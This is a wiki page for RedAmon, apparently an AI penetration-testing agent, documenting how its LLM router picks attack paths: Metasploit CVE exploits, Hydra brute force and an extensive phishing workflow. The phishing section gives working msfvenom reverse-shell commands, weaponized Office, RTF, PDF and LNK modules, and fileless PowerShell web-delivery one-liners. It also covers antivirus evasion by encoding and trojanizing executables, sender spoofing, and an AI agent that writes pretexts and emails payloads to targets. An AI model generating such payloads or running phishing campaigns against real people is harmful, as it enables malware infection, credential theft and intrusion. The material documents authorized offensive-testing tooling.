Skip to content

16. Attack Paths

Jump to bottom
“samuele edited this page Feb 28, 2026 · 1 revision

Attack Paths

The RedAmon AI agent uses an LLM-powered Intent Router to classify each user request into the appropriate attack path. Rather than following a single exploitation workflow, the router analyzes the user's objective and selects the correct attack chain — each with its own tool sequence, workflow prompts, and post-exploitation behavior.

This page documents all implemented attack paths in detail.

Table of Contents

  1. Attack Path Overview
  2. How Classification Works
  3. CVE-Based Exploitation
  4. Hydra Brute Force
  5. Phishing / Social Engineering
  6. Unclassified Fallback

Attack Path Overview

The agent supports three classified attack paths plus a dynamic unclassified fallback:

# Attack Path Badge Classification Key Description
1 CVE-Based Exploitation CVE (orange) cve_exploit Exploits known CVE vulnerabilities via Metasploit modules
2 Hydra Brute Force BRUTE (purple) brute_force_credential_guess Password guessing against 50+ protocols via THC Hydra
3 Phishing / Social Engineering PHISH (pink) phishing_social_engineering Payload generation, malicious documents, web delivery, email campaigns
4 Unclassified Fallback grey <term>-unclassified Generic tool usage for SQL injection, XSS, SSRF, etc.

Each classified path has a dedicated set of workflow prompts that guide the agent through the attack chain step by step. The unclassified fallback uses all available tools generically without a mandatory workflow.

How Classification Works

When you send an exploitation request, the agent's Intent Router (an LLM classification step) analyzes your message and determines:

  1. Phase: Is this informational (reconnaissance) or exploitation (active attack)?
  2. Attack path type: Which workflow matches the request?

The classification uses keyword matching, example patterns, and a decision tree:

User request
    │
    ├── Mentions CVE ID, vulnerability, or exploit module? → cve_exploit
    ├── Mentions password, brute force, credentials, wordlist? → brute_force_credential_guess
    ├── Mentions phishing, payload, malicious document, msfvenom, social engineering? → phishing_social_engineering
    ├── Matches a known technique (SQLi, XSS, SSRF, etc.)? → <term>-unclassified
    └── Truly unclear? → cve_exploit (default)

The classification determines which workflow prompts the agent sees in its system prompt. This means the agent receives different instructions depending on the attack type — it doesn't see brute force prompts when doing phishing, and vice versa.

CVE-Based Exploitation

Classification: cve_exploit Badge: CVE (orange) Tools: metasploit_console, kali_shell, execute_code

The agent searches for a matching Metasploit exploit module, configures target parameters and payload (reverse/bind shell), and fires the exploit. Supports both statefull (Meterpreter session) and stateless (one-shot command) post-exploitation.

12-Step Workflow:

  1. search CVE-XXXX-XXXXX — find exploit module
  2. use exploit/path/... — load module
  3. info — get module description
  4. show targets — list OS/app versions
  5. show options — display configurable params
  6. set TARGET <N> — select target type
  7. show payloads — list compatible payloads
  8. set CVE CVE-XXXX-XXXXX — set CVE variant
  9. set PAYLOAD <payload> — choose payload
  10. set RHOSTS/RPORT/SSL — configure connection
  11. set LHOST/LPORT (or CMD) — mode-specific options
  12. exploit — execute

No-Module Fallback: When no Metasploit module exists for a CVE, the agent falls back to manual exploitation using execute_code, kali_shell, execute_nuclei, and execute_curl with PoC scripts.

For full details, see the Attack Paths Architecture documentation.

Hydra Brute Force

Classification: brute_force_credential_guess Badge: BRUTE (purple) Tool: execute_hydra

Uses THC Hydra to brute force credentials against 50+ authentication protocols. The agent automatically selects appropriate wordlists, configures protocol-specific parameters, and establishes access after credentials are discovered.

Supported protocols include: SSH, FTP, RDP, VNC, SMB, Telnet, MySQL, MSSQL, PostgreSQL, Oracle, MongoDB, Redis, POP3, IMAP, SMTP, HTTP Basic, HTTP POST form, Tomcat, WordPress, Jenkins, and many more.

Configuration: Threads, timeouts, extra checks, and retry strategies are configurable per project in the Attack Paths tab. See Project Settings Reference > Hydra Brute Force.

For full details, see the Attack Paths Architecture documentation.

Phishing / Social Engineering

Classification: phishing_social_engineering Badge: PHISH (pink) Tools: kali_shell (msfvenom), metasploit_console (fileformat modules, handler, web_delivery), execute_code (email sending)

This attack path targets human factors rather than software vulnerabilities. Instead of exploiting a bug directly, the agent generates malicious payloads, weaponized documents, or delivery mechanisms that require a human to execute — opening a file, clicking a link, or running a command.

Key difference from CVE Exploit: CVE exploitation targets a software vulnerability directly — the agent fires the exploit and the service is compromised automatically. Phishing targets a person — the agent generates a weaponized artifact and delivers it, but a human must execute it for the attack to succeed. This is a human-in-the-loop attack path.

How It Works: The 6-Step Workflow

The agent follows a mandatory 6-step workflow:

┌─────────────────────────────────────────────────────────────────────────┐
│              PHISHING / SOCIAL ENGINEERING WORKFLOW                       │
├─────────────────────────────────────────────────────────────────────────┤
│                                                                          │
│  Step 1: DETERMINE TARGET PLATFORM & DELIVERY METHOD                    │
│    ├── Target OS: Windows / Linux / macOS / Android / Multi-platform    │
│    └── Method: A) Standalone Payload  B) Malicious Document             │
│                C) Web Delivery        D) HTA Delivery                   │
│                                                                          │
│  Step 2: SET UP HANDLER (always — runs in background)                   │
│    └── exploit/multi/handler + matching payload + LHOST/LPORT + run -j  │
│                                                                          │
│  Step 3: GENERATE PAYLOAD / DOCUMENT (choose one method)                │
│    ├── A: msfvenom → exe/elf/apk/ps1/vba/hta-psh/war/macho/raw        │
│    ├── B: Metasploit fileformat → Word/Excel/PDF/RTF/LNK               │
│    ├── C: web_delivery → Python/PHP/PSH/Regsvr32/pubprn one-liner      │
│    └── D: hta_server → URL the target opens in browser                  │
│                                                                          │
│  Step 4: VERIFY PAYLOAD WAS GENERATED                                   │
│    └── ls -la, file command, jobs check                                  │
│                                                                          │
│  Step 5: DELIVER TO TARGET                                               │
│    ├── Chat download: report path + docker cp command                   │
│    ├── Email: execute_code with Python smtplib (SMTP config from        │
│    │          project settings or asked at runtime)                      │
│    └── Web link: report one-liner (Method C) or URL (Method D)          │
│                                                                          │
│  Step 6: WAIT FOR CALLBACK & VERIFY SESSION                             │
│    └── sessions -l → if session opens → post_exploitation               │
│                                                                          │
└─────────────────────────────────────────────────────────────────────────┘

Step 1 — If the user's request doesn't specify the target platform or delivery method, the agent asks via action="ask_user". If the request is specific (e.g., "create a malicious Word document"), the agent skips asking and proceeds directly.

Step 2 — The handler is always set up first (or in parallel with payload generation). It runs as a background job (run -j) so it waits while the payload is generated and delivered.

Step 3 — The agent chooses the generation method based on the user's request and target platform. Each method is detailed below.

Step 4 — The agent verifies the artifact was created before attempting delivery. For msfvenom payloads, it checks the file exists and its type. For web delivery and HTA, it confirms the background job is running.

Step 5 — Delivery depends on the method and user preference. Chat download is the default (the agent provides a docker cp command). Email delivery and web links are used when requested.

Step 6 — After delivery, the agent monitors for a callback. When a Meterpreter session opens, it requests transition to post_exploitation phase.

Method A: Standalone Payload (msfvenom)

Generate a binary, script, or APK that the target executes directly. Uses msfvenom via the kali_shell tool.

Command syntax:

msfvenom -p <payload> LHOST=<attacker_ip> LPORT=<port> -f <format> -o /tmp/<filename>

Payload + Format Matrix

Windows Payloads:

Payload Format Output Use Case
windows/meterpreter/reverse_tcp exe payload.exe Most common — standard Windows executable
windows/meterpreter/reverse_https exe payload.exe Encrypted traffic — bypasses firewalls and DPI
windows/shell_reverse_tcp exe shell.exe Fallback when meterpreter is detected by AV
windows/meterpreter/reverse_tcp psh payload.ps1 PowerShell script — no EXE on disk
windows/meterpreter/reverse_tcp psh-reflection payload.ps1 Reflective PowerShell — better AV evasion
windows/meterpreter/reverse_tcp vba payload.vba VBA macro code — paste into Office document
windows/meterpreter/reverse_tcp hta-psh payload.hta HTA file with embedded PowerShell
windows/meterpreter/reverse_tcp vbs payload.vbs VBScript — runs via wscript.exe
windows/meterpreter/reverse_tcp asp payload.asp Classic ASP web shell — deploy to IIS

Linux Payloads:

Payload Format Output Use Case
linux/x64/meterpreter/reverse_tcp elf payload.elf Standard Linux ELF binary
linux/x64/shell_reverse_tcp elf shell.elf Shell fallback if meterpreter fails
cmd/unix/reverse_bash raw payload.sh Bash one-liner — no binary needed
cmd/unix/reverse_python raw payload.py Python one-liner — cross-platform
cmd/unix/reverse_netcat raw payload.sh Netcat-based reverse shell

macOS Payloads:

Payload Format Output Use Case
osx/x64/meterpreter/reverse_tcp macho payload.macho macOS Mach-O binary
osx/x64/shell_reverse_tcp macho shell.macho Shell fallback for macOS

Mobile Payloads:

Payload Format Output Use Case
android/meterpreter/reverse_tcp raw payload.apk Android APK — install on target device

Web / Multi-platform Payloads:

Payload Format Output Use Case
java/meterpreter/reverse_tcp war payload.war Java WAR — deploy to Tomcat/JBoss/WebLogic
java/meterpreter/reverse_tcp jar payload.jar Java JAR — cross-platform Java targets
python/meterpreter/reverse_tcp raw payload.py Python — works anywhere Python is installed
php/meterpreter/reverse_tcp raw payload.php PHP — deploy to web server
cmd/unix/reverse_ruby raw payload.rb Ruby — for systems with Ruby installed

Example — Windows EXE:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f exe -o /tmp/payload.exe

Example — Linux ELF:

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f elf -o /tmp/payload.elf

Example — Android APK:

msfvenom -p android/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 R > /tmp/payload.apk

Useful msfvenom flags:

Flag Purpose Example
-p Payload to use -p windows/meterpreter/reverse_tcp
LHOST= Callback IP address LHOST=10.0.0.1
LPORT= Callback port LPORT=4444
-f Output format -f exe, -f elf, -f raw
-o Output file path -o /tmp/payload.exe
-e Encoder for AV evasion -e x86/shikata_ga_nai
-i Encoding iterations -i 5
-a Architecture -a x86, -a x64
--platform Target platform --platform windows
-x Inject into existing executable -x /tmp/putty.exe
-k Keep template functionality (with -x) -k
-b Bad characters to avoid -b '\x00\x0a'
--list payloads List all available payloads msfvenom --list payloads | grep windows
--list formats List output formats msfvenom --list formats
--list encoders List available encoders msfvenom --list encoders

Method B: Malicious Document (Metasploit Fileformat)

Generate weaponized Office, PDF, RTF, or LNK files using Metasploit fileformat modules. The target opens the document, which executes the embedded payload (via macro, exploit, or link).

B1: Word Document with VBA Macro (.docm)

Creates a Word document with an embedded VBA macro. When the target opens the document and enables macros (the "Enable Content" prompt), the macro executes and opens a Meterpreter session.

use exploit/multi/fileformat/office_word_macro
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.0.0.1
set LPORT 4444
set FILENAME report_q1_2026.docm
run

How the victim triggers it: They receive the document via email or download. When opened in Microsoft Word, a yellow bar appears: "SECURITY WARNING: Macros have been disabled." If the victim clicks "Enable Content", the macro runs and the callback fires.

B2: Excel Document with VBA Macro (.xlsm)

Same concept as Word but in an Excel spreadsheet. Common in corporate phishing — disguised as financial reports, invoices, or data exports.

use exploit/multi/fileformat/office_excel_macro
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.0.0.1
set LPORT 4444
set FILENAME invoice_march_2026.xlsm
run

B3: PDF with Embedded Executable (Adobe Reader)

Creates a PDF that contains an embedded executable payload. When opened in vulnerable versions of Adobe Reader, the payload auto-executes.

use exploit/windows/fileformat/adobe_pdf_embedded_exe
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.0.0.1
set LPORT 4444
set FILENAME security_audit_results.pdf
run

Note: This targets older Adobe Reader versions. Modern readers will show a security warning. Most effective against targets with outdated PDF software.

B4: RTF with HTA Handler (CVE-2017-0199)

Creates an RTF document that, when opened, automatically fetches and executes an HTA payload from the attacker's server. The module self-hosts the HTA payload — no additional setup needed.

use exploit/windows/fileformat/office_word_hta
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.0.0.1
set LPORT 4444
set SRVHOST 0.0.0.0
set SRVPORT 8080
set FILENAME urgent_memo.rtf
run

How it works: The RTF contains an OLE object that triggers an HTTP request to the attacker's HTA server when the document is opened. The server responds with an HTA application that executes the payload. This is particularly dangerous because it requires no macro approval — it exploits CVE-2017-0199 in Microsoft Office.

B5: LNK Shortcut File

Creates a malicious Windows shortcut (.lnk) that executes a payload when the target double-clicks it. LNK files can be disguised with any icon (folder, document, etc.).

use exploit/windows/fileformat/lnk_shortcut_ftype_append
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.0.0.1
set LPORT 4444
set FILENAME Important_Documents.lnk
run

Delivery trick: Place the LNK file on a USB drive or shared folder. Disguise it with a folder icon so the target thinks they're opening a directory.

Important: Fileformat Module Output Location

All Metasploit fileformat modules save output to:

/root/.msf4/local/<FILENAME>

The agent always copies the file to /tmp/ after generation for easier access:

cp /root/.msf4/local/report_q1_2026.docm /tmp/

Method C: Web Delivery (Fileless)

Host a payload on the attacker's web server and generate a one-liner command that the target pastes into a terminal or command prompt. The payload executes entirely in memory — no file ever touches disk. This is the most stealthy delivery method.

use exploit/multi/script/web_delivery
set TARGET <number>
set PAYLOAD <payload>
set LHOST 10.0.0.1
set LPORT 4444
set SRVHOST 0.0.0.0
set SRVPORT 8080
run -j

Target Selection

TARGET # Language Runs On Payload Example Best For
0 Python Linux, macOS, Windows (with Python) python/meterpreter/reverse_tcp Cross-platform targets with Python installed
1 PHP Web servers with PHP php/meterpreter/reverse_tcp Compromised web servers, shared hosting
2 PSH (PowerShell) Windows 7+ windows/meterpreter/reverse_tcp Standard Windows targets (most common)
3 Regsvr32 Windows windows/meterpreter/reverse_tcp Bypass AppLocker and software restriction policies
4 pubprn Windows windows/meterpreter/reverse_tcp Script execution policy bypass via pubprn.vbs
5 SyncAppvPublishingServer Windows 10+ windows/meterpreter/reverse_tcp App-V service bypass
6 PSH (Binary) Windows windows/meterpreter/reverse_tcp PowerShell binary delivery (larger but more reliable)

How it works:

  1. The module starts a web server on SRVHOST:SRVPORT inside the Kali container
  2. It generates a one-liner command and prints it in the console output
  3. When the target executes the one-liner, it downloads and runs the payload in memory
  4. The handler catches the callback and opens a session

Example one-liner output (PowerShell, TARGET 2):

powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcg...

Delivery scenarios:

  • Social-engineer the target into opening a command prompt and pasting the command
  • Inject the one-liner into a script the target will run
  • Embed it in a malicious document's macro that shells out to PowerShell
  • Have the target run it through a fake "IT support" scenario

Method D: HTA Delivery Server

Host an HTA (HTML Application) that executes a payload when the target opens it in their browser. HTA files have full access to Windows system APIs — they run with the same privileges as a native application.

use exploit/windows/misc/hta_server
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.0.0.1
set LPORT 4444
set SRVHOST 0.0.0.0
set SRVPORT 8080
run -j

Output: The module prints a URL like:

http://10.0.0.1:8080/AbCdEf.hta

How the victim triggers it:

  • Receives the URL in a phishing email or chat message
  • Opens the URL in Internet Explorer or Edge (legacy mode)
  • Windows prompts "Do you want to run or save this file?" — if they click Run, the HTA executes
  • The HTA runs PowerShell or other commands that download and execute the payload

When to use HTA vs. Web Delivery:

  • HTA: Target will visit a URL in a browser. Requires Windows + IE/Edge.
  • Web Delivery: Target will paste a command into a terminal. Works on any OS.

The Handler

Every phishing attack requires a handler — the listener that catches the callback when the target executes the payload. The handler is set up via exploit/multi/handler in the Metasploit console.

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.0.0.1
set LPORT 4444
run -j

Critical rules:

  1. The handler MUST match the payload exactly — same payload type, same LHOST, same LPORT. A mismatch causes the callback to silently fail with no error message.
  2. Run with -j (background job) — the handler waits indefinitely for a connection while you prepare and deliver the payload.
  3. Set up the handler FIRST (or in parallel with payload generation) — if the target executes the payload before the handler is running, the callback is lost.
  4. LHOST/LPORT come from the project's "Pre-Configured Payload Settings" (configured in the Agent Behaviour tab). If ngrok TCP tunnel is enabled, the public endpoint is used automatically.

For BIND mode (rare in phishing — the target machine must be directly reachable):

use exploit/multi/handler
set PAYLOAD windows/meterpreter/bind_tcp
set RHOST <target_ip>
set LPORT 4444
run -j

Delivery Methods

After generating the payload, the agent delivers it through one of three channels.

Chat Download (Default)

The agent reports the file location, file size, payload type, and handler status. It provides a docker cp command for you to download the file:

docker cp redamon-kali:/tmp/payload.exe ./payload.exe

You then deliver the file to the target manually through any channel — email (from your own client), chat, USB drive, shared network drive, or any other method.

This is the default delivery — the agent always provides this option regardless of other settings.

Email Delivery (On Request)

When you ask the agent to send the payload via email, it uses execute_code with Python smtplib to compose and send the email. The agent writes a Python script inside the Kali container that:

  1. Connects to an external SMTP server (Gmail, Outlook, etc.)
  2. Composes an email with a convincing subject and body
  3. Attaches the payload file (for Methods A & B) or embeds a link (for Methods C & D)
  4. Sends the email to the specified target address

The agent crafts the email content based on the attack scenario — it generates appropriate pretexts (IT support, invoice, report, security alert, etc.).

Web Delivery Link (Methods C & D)

For web delivery and HTA attacks, there's no file to transfer. The agent reports:

  • Method C: The one-liner command printed by web_delivery
  • Method D: The URL printed by hta_server

You deliver these through any channel — email body, chat message, embedded in a document, etc.

SMTP Configuration for Email Delivery

SMTP settings for email delivery are configured in the project's Attack Paths tab (Tab 11) as a free-text textarea.

Example configuration:

SMTP_HOST: smtp.gmail.com
SMTP_PORT: 587
SMTP_USER: pentest@gmail.com
SMTP_PASS: abcd efgh ijkl mnop
SMTP_FROM: it-support@company.com
USE_TLS: true

Supported SMTP providers:

Provider Host Port Auth Notes
Gmail smtp.gmail.com 587 (TLS) App Password Requires 2FA enabled + App Password (not your login password)
Outlook/Office 365 smtp.office365.com 587 (TLS) Password May require admin to enable SMTP AUTH
Yahoo smtp.mail.yahoo.com 587 (TLS) App Password Similar to Gmail — generate an App Password
SendGrid smtp.sendgrid.net 587 (TLS) API Key Free tier: 100 emails/day
Mailgun smtp.mailgun.org 587 (TLS) API credentials Free tier: sandbox domain
Amazon SES email-smtp.<region>.amazonaws.com 587 (TLS) IAM credentials Must verify sender address/domain
Custom/Self-hosted Your server 25/465/587 Varies Must have proper SPF/DKIM/DMARC

If no SMTP settings are configured, the agent asks you at runtime for the SMTP host, port, username, password, sender address, and target email address. It never attempts to send email without credentials.

Why is SMTP required? Email cannot be sent "directly" from the Kali container. Modern mail servers (Gmail, Outlook, corporate servers) reject emails from IP addresses without proper SPF, DKIM, and DMARC DNS records. Direct SMTP connections from unknown IPs are flagged as spam or rejected outright. The agent relays through a legitimate SMTP service to ensure delivery.

SMTP_FROM vs SMTP_USER: SMTP_USER is the account you authenticate with. SMTP_FROM is the "From" address shown to the recipient. Some SMTP providers allow these to differ (useful for spoofing a sender address), while others require them to match.

AV Evasion Techniques

The agent can apply encoding and obfuscation to generated payloads to bypass antivirus detection.

Shikata Ga Nai Encoding

The most common encoder in msfvenom. Applies polymorphic XOR encoding that produces a different output each time:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 \
  -e x86/shikata_ga_nai -i 5 -f exe -o /tmp/payload_encoded.exe
Flag Purpose
-e x86/shikata_ga_nai Use the shikata_ga_nai encoder
-i 5 Apply 5 encoding iterations (more = harder to detect, larger file)

Template Injection (Trojanizing)

Inject the payload into an existing legitimate executable. The target sees a normal application that also runs the payload:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 \
  -x /tmp/putty.exe -k -f exe -o /tmp/putty_trojan.exe
Flag Purpose
-x /tmp/putty.exe Template executable to inject into
-k Keep the template's original functionality (putty still works)

Multiple Encoders

Chain multiple encoders for deeper obfuscation:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 \
  -e x86/shikata_ga_nai -i 3 -f raw | \
  msfvenom -e x86/countdown -i 2 -f exe -o /tmp/payload_multi.exe

Bad Character Avoidance

When targeting services that filter certain bytes (null bytes, newlines, etc.):

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 \
  -b '\x00\x0a\x0d' -f exe -o /tmp/payload_clean.exe

Available encoders (list with msfvenom --list encoders):

Encoder Arch Rank Use Case
x86/shikata_ga_nai x86 Excellent General AV evasion, polymorphic
x86/countdown x86 Normal Additional layer with shikata
x64/xor x64 Normal 64-bit payload encoding
x86/bloxor x86 Manual Block-based XOR encoding
cmd/powershell_base64 cmd Excellent PowerShell base64 encoding
php/base64 php Great PHP payload encoding

Post-Exploitation After Phishing

When the target executes the payload and the handler catches the callback, a Meterpreter session opens. The agent then requests a phase transition to post_exploitation — this is identical to post-exploitation after a CVE exploit:

  • Statefull mode: Interactive Meterpreter commands — sysinfo, getuid, hashdump, upload, download, portfwd, shell, migrate, privilege escalation, lateral movement
  • Stateless mode: Re-generate and deliver payloads with different commands

The phase transition requires user approval (if approval gates are enabled).

If no session opens after delivery, the agent follows a retry strategy:

  1. Verify the handler is still running: jobs in metasploit_console
  2. Verify payload/handler match: same payload type, LHOST, LPORT
  3. Try a different payload format (e.g., switch from exe to psh-reflection)
  4. Ask the user via action="ask_user" if the target has executed the payload
  5. After 3 failed attempts: Stop and ask the user for guidance — do not keep trying the same approach

Troubleshooting

Problem Cause Solution
msfvenom "Invalid payload" Wrong payload name List available: msfvenom --list payloads | grep <term>
Fileformat module "exploit completed but no session" Expected — fileformat modules generate files, not sessions The session comes when the target opens the file
Handler dies immediately LHOST is wrong or port is in use Use 0.0.0.0 for LHOST; check port: netstat -tlnp | grep 4444
Target executes but no callback Firewall blocks outbound connection Try reverse_https (port 443) or bind_tcp instead
"Payload is too large" Format or encoder produces too-large output Use staged payload or different format
Web delivery one-liner blocked AppLocker or execution policy Try Regsvr32 (TARGET 3) for AppLocker bypass
Email not delivered SMTP auth failed or spam filtered Check App Password, try a different SMTP provider
Email sent but payload blocked Email gateway strips attachments Use web delivery link instead of file attachment
Android APK won't install "Install from unknown sources" disabled Target must enable it in Settings > Security
HTA URL shows download prompt Edge/Chrome instead of IE HTA only auto-runs in Internet Explorer

Example Scenarios

Scenario 1: Windows EXE Payload via Chat Download

You: "Generate a Windows reverse shell payload"

The agent:

  1. Sets up handler: exploit/multi/handler with windows/meterpreter/reverse_tcp
  2. Generates: msfvenom -p windows/meterpreter/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f exe -o /tmp/payload.exe
  3. Verifies: ls -la /tmp/payload.exe && file /tmp/payload.exe
  4. Reports path + docker cp redamon-kali:/tmp/payload.exe ./payload.exe

Scenario 2: Malicious Excel Macro via Email

You: "Create a malicious Excel spreadsheet with a macro and send it via email to target@example.com"

The agent:

  1. Sets up handler with windows/meterpreter/reverse_tcp
  2. Generates: exploit/multi/fileformat/office_excel_macroinvoice_march.xlsm
  3. Copies from /root/.msf4/local/invoice_march.xlsm to /tmp/
  4. Reads SMTP config from project settings
  5. Writes Python script with smtplib to send the file as an attachment with a convincing pretext
  6. Sends the email and reports delivery status

Scenario 3: PowerShell Web Delivery

You: "Set up a PowerShell web delivery attack"

The agent:

  1. Sets up handler with windows/meterpreter/reverse_tcp
  2. Runs: exploit/multi/script/web_delivery with TARGET 2 (PSH)
  3. Reports the one-liner command printed by the module
  4. No file transfer needed — you deliver the one-liner through any channel

Scenario 4: Android APK Backdoor

You: "Generate an Android APK backdoor"

The agent:

  1. Sets up handler with android/meterpreter/reverse_tcp
  2. Generates: msfvenom -p android/meterpreter/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> R > /tmp/update.apk
  3. Verifies the APK was created
  4. Reports path + download command

Scenario 5: RTF Exploit (No Macro Approval Needed)

You: "Create an RTF document that doesn't require the target to enable macros"

The agent:

  1. Uses Method B4: exploit/windows/fileformat/office_word_hta (CVE-2017-0199)
  2. This exploit fires automatically when the RTF is opened — no "Enable Content" prompt
  3. The module self-hosts the HTA payload on SRVHOST:SRVPORT
  4. Reports the file + notes that the HTA server must stay running until the target opens the document

Scenario 6: AV Evasion with Encoded Payload

You: "Generate a phishing payload for Windows with AV evasion"

The agent:

  1. Sets up handler
  2. Generates with encoding: msfvenom -p windows/meterpreter/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -e x86/shikata_ga_nai -i 5 -f exe -o /tmp/payload_encoded.exe
  3. Optionally tries template injection if the user provides a template executable
  4. Verifies and reports

Unclassified Fallback

Classification: <descriptive_term>-unclassified (e.g., sql_injection-unclassified, ssrf-unclassified) Badge: grey Tools: All available exploitation tools

For techniques that don't match CVE exploit, brute force, or phishing — such as SQL injection, XSS, SSRF, file upload, command injection, directory traversal, deserialization, and more. The agent uses all available tools generically without a mandatory step-by-step workflow.

The classification generates a descriptive snake_case term (1-4 words) followed by -unclassified:

  • "Try SQL injection on the web app" → sql_injection-unclassified
  • "Test for SSRF on the API" → ssrf-unclassified
  • "Upload a web shell" → file_upload-unclassified

The agent can still use all available tools (metasploit_console, kali_shell, execute_code, execute_curl, etc.) — it just doesn't receive attack-path-specific prompt guidance. The ReAct reasoning loop handles these generically.

Next Steps

RedAmon GitHub Repository | Report an Issue | Back to Home

Home

User Guide

  1. Getting Started
  2. User Management
  3. Creating a Project
  4. The Graph Dashboard
  5. Running Reconnaissance
  6. GVM Vulnerability Scanning
  7. GitHub Secret Hunting
  8. AI Agent Guide
  9. CypherFix — Automated Remediation

Reference

  1. Project Settings Reference
  2. AI Model Providers
  3. Attack Surface Graph
  4. Data Export & Import
  5. EvoGraph — Attack Chain Evolution
  6. Attack Paths

Help

  1. Troubleshooting

Clone this wiki locally